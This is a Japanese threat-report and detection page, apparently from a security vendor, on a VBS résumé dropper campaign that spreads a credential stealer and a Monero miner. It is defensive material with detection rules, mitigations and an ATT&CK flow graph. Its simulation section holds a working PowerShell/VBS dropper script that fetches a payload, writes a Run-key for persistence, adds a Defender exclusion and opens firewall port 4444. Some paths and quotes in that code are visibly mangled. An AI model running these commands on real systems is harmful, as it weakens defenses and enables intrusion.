フォローする 
Detection stack
- AIDR
- Alert
- ETL
- Query
概要
サイバー犯罪の活動は、悪意のあるVBS履歴書ファイルを利用してフランス語圏の企業環境を標的にしています。このドロッパーは高度に難読化されており、ドメインに参加しているマシンでのみ実行されるよう設計されており、そこでは資格情報盗難用マルウェアとMoneroマイナーを配信します。このキャンペーンは、DropboxやモロッコのWordPressサイトを改竄してペイロードをホストする信頼できるサービスを使用しています。盗まれたデータはSMTPを通じて mail.ruに送信され、マルウェアは実行後に痕跡を消去し、法医学的な可視性を低減します。
調査
研究者たちはVBSドロッパーを逆コンパイルし、その環境チェックを明らかにし、7-Zip抽出、RuntimeHost.exeというカスタムRAT、ChromElevatorブラウザ資格情報盗難、XMRigマイニング活動を含む完全な多段階感染チェーンをマップしました。また、IPアドレス、ダイナミックDNSエントリ、ハッキングされたWordPressサーバーなど、サポートインフラストラクチャも特定しました。持続性はレジストリのRunキーと隠されたスケジュールされたタスクに関連付けられていました。
緩和策
ディフェンダーは疑わしいVBSファイルをブロックし、電子メールの添付ファイルに対して厳格な制御を強化する必要があります。監視はwscript.exeの不正な実行や、Defenderの例外を追加するPowerShellコマンド、およびEnableLUAに影響を与えるレジストリ変更に焦点を当てるべきです。組織は外出SMTPを非メールアプリケーションから制限し、既知のDropboxやマイニングプールインフラストラクチャへの接続を監視する必要があります。特定されたレジストリキーやスケジュールされたタスクは削除または隔離されるべきです。
対応
セキュリティチームは、”Microsoft Media Service”および”z_MicrosoftEdgeAutoLaunch_2EDFBF”のRunキーの作成、ならびに隠された”MicrosoftUpdateService”のスケジュールされたタスクを検出すべきです。wscript.exeプロセスがDropboxやドキュメントされたWordPressドメインにアクセスした場合にアラートが発生するようにする必要があります。悪意のあるファイルは隔離し、ホストを孤立させ、公開されたブラウザ資格情報をリセットする必要があります。その後、法医学的レビューにより、盗まれたデータが mail.ru.
"graph TB %% クラス定義 classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef process fill:#ffddaa classDef technique fill:#c0c0c0 %% ノード定義 step_phishing["<b>技術</b> – T1566.001 フィッシング: スピアフィッシングの添付ファイル<br/><b>説明</b>: 開くと初期ペイロードを配信する悪意のある添付メール。"] class step_phishing action step_user_execute["<b>技術</b> – T1204.002 ユーザー実行: 悪意のあるファイル<br/><b>説明</b>: 添付されたVBSファイルを実行して、ドロッパーをトリガー。"] class step_user_execute action step_dropper["<b>技術</b> – T1059.005 Visual Basic (VBScript)<br/><b>技術</b> – T1027 難読化されたファイルまたは情報<br/><b>説明</b>: 隠されたVBSスクリプトが追加のコンポーネントを抽出するドロッパーとして機能。"] class step_dropper action step_domain_check["<b>技術</b> – T1069.002 権限グループの探索: ドメイン<br/><b>説明</b>: ホストがドメインに参加しているかどうかを確認して動作を調整。"] class step_domain_check technique step_uac_bypass["<b>技術</b> – T1548.002 ユーザーアカウント制御バイパス<br/><b>技術</b> – T1562.001 防御の崩壊: セキュリティツールの無効化<br/><b>技術</b> – T1564.012 アーティファクトの隠蔽: Defenderの例外<br/><b>説明</b>: 特権を引き上げ、防御を無効にし、例外を追加。"] class step_uac_bypass technique step_download["<b>技術</b> – T1102 ウェブサービス<br/><b>技術</b> – T1102.001 デッドドロップリゾルバ<br/><b>説明</b>: Dropboxやウェブロケーションから追加のペイロードを取得。"] class step_download technique step_deploy_toolkit["<b>ツール</b> – RuntimeHost.exe, XMRig Miner, ブラウザ盗賊<br/><b>説明</b>: マイニング、資格情報の盗難、およびさらなる悪用のためにコンポーネントを展開。"] class step_deploy_toolkit tool step_cred_access["<b>技術</b> – T1555.003 ウェブブラウザからの資格情報<br/><b>説明</b>: 保存されているブラウザのパスワードとクッキーを抽出。"] class step_cred_access technique step_collect_files["<b>技術</b> – T1005 ローカルシステムからのデータ<br/><b>説明</b>: ユーザのデスクトップからファイルを収集して漏洩。"] class step_collect_files technique step_exfiltration["<b>技術</b> – T1048.002 暗号化された非C2プロトコルを介した流出: SMTP<br/><b>技術</b> – T1071.003 ウェブプロトコル: メールプロトコル<br/><b>説明</b>: 暗号化されたSMTPで収集したデータを送信。"] class step_exfiltration technique step_resource_hijack["<b>技術</b> – T1496 リソースの乗っ取り<br/><b>説明</b>: XMRigを使用して被害者のホストで暗号通貨をマイニング。"] class step_resource_hijack technique step_process_injection["<b>技術</b> – T1055 プロセスインジェクション<br/><b>説明</b>: 悪意のあるコードをexplorer.exeに注入して活動を隠蔽。"] class step_process_injection technique step_c2["<b>技術</b> – T1102 ウェブサービス (HTTPS/ダイナミックDNS)<br/><b>説明</b>: 暗号化されたウェブトラフィックとカスタムポートを介してコマンドアンドコントロールを維持。"] class step_c2 technique step_persistence["<b>技術</b> – T1547.001 登録実行キー/スタートアップフォルダ<br/><b>技術</b> – T1053 スケジュールされたタスク/ジョブ (隠し)<br/><b>説明</b>: 実行キーと隠されたスケジュールされたタスクを介して持続性を確立。"] class step_persistence technique step_cleanup["<b>技術</b> – T1070.004 ファイル削除<br/><b>説明</b>: 検出を回避するためにアーティファクトとログを削除。"] class step_cleanup technique %% エッジ接続 step_phishing –>|leads_to| step_user_execute step_user_execute –>|leads_to| step_dropper step_dropper –>|leads_to| step_domain_check step_domain_check –>|leads_to| step_uac_bypass step_uac_bypass –>|leads_to| step_download step_download –>|leads_to| step_deploy_toolkit step_deploy_toolkit –>|enables| step_cred_access step_deploy_toolkit –>|enables| step_collect_files step_cred_access –>|combined_with| step_collect_files step_cred_access –>|supports| step_exfiltration step_collect_files –>|supports| step_exfiltration step_deploy_toolkit –>|enables| step_resource_hijack step_deploy_toolkit –>|enables| step_process_injection step_process_injection –>|provides| step_c2 step_c2 –>|used_by| step_exfiltration step_deploy_toolkit –>|establishes| step_persistence step_persistence –>|followed_by| step_cleanup step_exfiltration –>|followed_by| step_cleanup "
攻撃フロー
検出
可能なIPルックアップドメイン通信の試行(DNS経由)
閲覧
Windows Defenderリアルタイム監視の無効化とその他の設定変更(コマンドライン経由)
閲覧
公共ユーザープロファイルからの疑わしい実行(プロセス作成経由)
閲覧
7-Zipを使用して暗号化されたアーカイブを抽出することでの可能な防御回避(コマンドライン経由)
閲覧
LOLBAS WScript / CScript(プロセス作成経由)
閲覧
Defender例外の不審な変更(コマンドライン経由)
閲覧
Windows Defenderの設定変更の疑わしい動き(PowerShell経由)
閲覧
可能な持続性のポイント [ASEPs – ソフトウェア/NTUSERハイブ](レジストリイベント経由)
閲覧
疑わしいスケジュールされたタスク(監査経由)
閲覧
ショートファイル名(コマンドライン経由)
閲覧
可能なUACバイパス – UAC無効化試行(レジストリイベント経由)
閲覧
公共ユーザープロファイル中の疑わしいファイル(ファイルイベント経由)
閲覧
検出するためのIOC(HashSha256):FAUX#ELEVATEを分析:フランスを標的とした攻撃者が企業環境を狙って暗号通貨マイナーと情報盗取ツールを配備するために履歴書の誘惑を使用
閲覧
検出するためのIOC(SourceIP):FAUX#ELEVATEを分析:フランスを標的とした攻撃者が企業環境を狙って暗号通貨マイナーと情報盗取ツールを配備するために履歴書の誘惑を使用
閲覧
検出するためのIOC(Emails):FAUX#ELEVATEを分析:フランスを標的とした攻撃者が企業環境を狙って暗号通貨マイナーと情報盗取ツールを配備するために履歴書の誘惑を使用
閲覧
検出するためのIOC(DestinationIP):FAUX#ELEVATEを分析:フランスを標的とした攻撃者が企業環境を狙って暗号通貨マイナーと情報盗取ツールを配備するために履歴書の誘惑を使用
閲覧
FAUX Elevateの資格情報および暗号通貨マイニングの検出 [Windowsネットワーク接続]
閲覧
SMTPおよびC2ドメイン通信検出 [Windowsネットワーク接続]
閲覧
FAUX#ELEVATEキャンペーンの持続性と資格情報盗難の検出 [Windowsプロセス作成]
閲覧
悪意のあるVBSドロッパーとファイアウォールの修正検出 [Windowsプロセス作成]
閲覧
シミュレーションの実行
前提条件:テレメトリ&ベースラインのプレフライトチェックが合格していること。
理由:このセクションは、検出ルールをトリガーするために設計された敵の技術(TTP)の正確な実行を詳細に示します。コマンドとナラティブは、特定されたTTPに直接反映し、検出ロジックによって期待される正確なテレメトリを生成することを目的としています。
-
攻撃の説明&コマンド:
- ステージ1 – 悪意のあるVBSをドロップ: 攻撃者は、2段階のペイロードをダウンロードし、持続性のためにレジストリランキーを書き込むVBSドロッパーを作成します。
- ステージ2 –
wscript.exeを介してVBSを実行し、 PowerShell を親プロセスとして、検出の親子条件を満たします。 - ステージ3 – VBS内で、PowerShellを呼び出してMicrosoft Defenderの例外(T1562.001)を追加し、Netshを使用してC2用に受信TCPポート4444(T1562.004)を開きます。
- ステージ4 – 成功後に証拠を整理します。
-
リグレッションテストスクリプト: (PowerShell – 自己完結型; 管理権限で実行)
# ----------------------------------------------------------------------- # 悪意のあるVBSドロッパーシミュレーション – Sigmaルールをトリガー: # イメージ == "*wscript.exe" と親イメージが ("*powershell.exe","*netsh.exe") にある # ----------------------------------------------------------------------- $vbsPath = "$env:Tempmalicious_dropper.vbs" $payloadUrl = "http://example.com/payload.exe" # プレースホルダーURL $payloadPath = "$env:Temppayload.exe" # 1. 悪意のあるVBSを作成し: # • ペイロードをダウンロード # • 持続性のためにランキーを作成 # • Defender例外を追加するためにPowerShellを呼び出す # • ファイアウォールルールを開くためにNetshを呼び出す $vbsContent = @" Set objXML = CreateObject("Microsoft.XMLHTTP") objXML.Open "GET", "$payloadUrl", False objXML.Send If objXML.Status = 200 Then Set objStream = CreateObject("ADODB.Stream") objStream.Type = 1 objStream.Open objStream.Write objXML.ResponseBody objStream.SaveToFile "$payloadPath", 2 End If
‘ ランキーを介した持続性 Set objShell = CreateObject(“WScript.Shell”) objShell.RegWrite “HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious”, “$payloadPath”
‘ PowerShellを介したDefender例外(インラインで実行)
objShell.Run “powershell.exe -NoProfile -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '$payloadPath'“”, 0, True
‘ Netshを介してファイアウォールポート4444を開く(インラインで実行)
objShell.Run “netsh.exe advfirewall firewall add rule name="MaliciousPort” dir=in action=allow protocol=TCP localport=4444″, 0, True “@
Set-Content -Path $vbsPath -Value $vbsContent -Encoding ASCII
# 2. PowerShellを親プロセスとしてVBSを起動
Write-Host "[*] PowerShellを親としてwscript.exe経由での悪意のあるVBSの起動"
Start-Process -FilePath "powershell.exe" -ArgumentList "-NoProfile -WindowStyle Hidden -Command `"wscript.exe `"$vbsPath`"`"" -Wait
# 3. ファイアウォールルールが追加されたことを確認(オプション)
netsh advfirewall firewall show rule name=MaliciousPort
# 4. アーティファクトのクリーンアップ(ペイロードとVBS) – 別のクリーンアップセクションに残す
Write-Host "[+] シミュレーション完了。SIEMでアラートを確認。"
-
クリーンアップコマンド: (検証後に実行)
# ファイアウォールルールを削除 netsh advfirewall firewall delete rule name="MaliciousPort" # Defenderの例外を削除 powershell.exe -Command "Remove-MpPreference -ExclusionPath '$env:Temppayload.exe'" # 持続性ランキーを削除 reg delete "HKCUSoftwareMicrosoftWindowsCurrentVersionRunmalicious" /f # ファイルを削除 Remove-Item -Path "$env:Tempmalicious_dropper.vbs" -Force Remove-Item -Path "$env:Temppayload.exe" -Force Write-Host "[+] クリーンアップ完了。"